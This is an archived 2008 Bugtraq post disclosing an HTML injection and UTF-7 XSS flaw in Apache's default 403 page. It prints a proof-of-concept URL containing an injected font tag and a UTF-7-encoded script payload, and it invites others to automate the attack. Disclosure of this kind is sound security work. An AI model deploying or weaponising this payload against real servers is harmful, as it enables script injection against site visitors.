Prev-20 Home Next-20 1 msg [ GLSA 200805-08 ] InspIRCd: Denial of Service Apache Server HTML Injection and UTF-7 XSS Vuln... \ lament hero (9 May 2008) . \ cxib (10 May 2008) . \ yos20053 (12 May 2008) . \ cxib (12 May 2008) . \ lament hero (15 May 2008) . \ Tom.Donovan (15 May 2008) 1 msg [USN-611-3] GStreamer Good Plugins vulnerability 1 msg [USN-611-2] vorbis-tools vulnerability 1 msg FLEA-2008-0008-1 firefox 1 msg [USN-611-1] Speex vulnerability 1 msg ezContents CMS Version 2.0.0 SQL Injection Vuln... 1 msg iDefense Security Advisory 05.07.08: Multiple V... 1 msg ZYWALL Referer Header XSS Vulnerability 1 msg iDefense Security Advisory 05.07.08: Multiple V... 1 msg iDefense Security Advisory 05.07.08: Multiple V... 1 msg [ GLSA 200805-04 ] eGroupWare: Multiple vulnera... 2 msg Re: After 6 months - fix available for Microsof... 1 msg Novell Client <= 4.91 SP4 Local Stack overfl... 9 msg Exploiting Google MX servers as Open SMTP Relays 1 msg Vulnerability in Multiple Web Application 1 msg VBZooM <=V1.11 'reply.php' SQL Injection Vul... 1 msg Multiple XSS In TuxCMS All Version 1 msg [ GLSA 200805-03 ] Multiple X11 terminals: Loca... 1 msg [USN-610-1] LTSP vulnerability Prev-20 Home Next-20

Prev-Msg Prev-Thread Bugtraq May-2008 Next-Thread Next-Msg Subject: Apache Server HTML Injection and UTF-7 XSS Vulnerability Group: Bugtraq From: lament hero Date: 9 May 2008 Apache Server HTML Injection and UTF-7 XSS Vulnerability This vulnerability was found by Yaniv Miron and Yossi Yakubov. This vulnerability will allow an attacker to inject an XSS to any Apache server that use the Forbidden 403 default page. After injecting this string: http://www.victim.com/Znl5g3k70ZaBUPYmN5RAGUdkskoprzGI63K4mIj2sqzbX0Kc3Fu7vfthep WhmKvjudPuJTNeK9zw5MaZ1yXJi8RJRRuPe5UahFwOblMXsIPTGh3pVjTLdim3vuTKgdazOG9idQbIjb npMEco8Zlo5xNRuCoviPx7x7tYYeOgc8HU46gaecJwnHY7f6GlQB8H6kBFhjoIaHE1SQPhU5VReCz1ol Ph5jZ%3Cfont%20size=50%3EDEFACED%3C!xc+ADw-script+AD4-alert('xss')+ADw-/script+A D4---//-- You will get a Forbidden 403 error message with an XSS alert. This string is combined from HTML Injection and a XSS string coded in UTF-7. This is only a PoC and because of that the browser should be in auto select mode of encoding so it could use the UTF-7 encoding. This attack had been tested on some Apache versions as 2.2.x and 1.3.x and on some versions of FireFox up to version 2.0.0.x and in IE 6 and 7. We leave it to other hackers to upgrade the attack and make it fully automatic. Yaniv Miron aka "Lament". Prev-Msg Prev-Thread Bugtraq May-2008 Next-Thread Next-Msg

© 2004-2008 readlist.com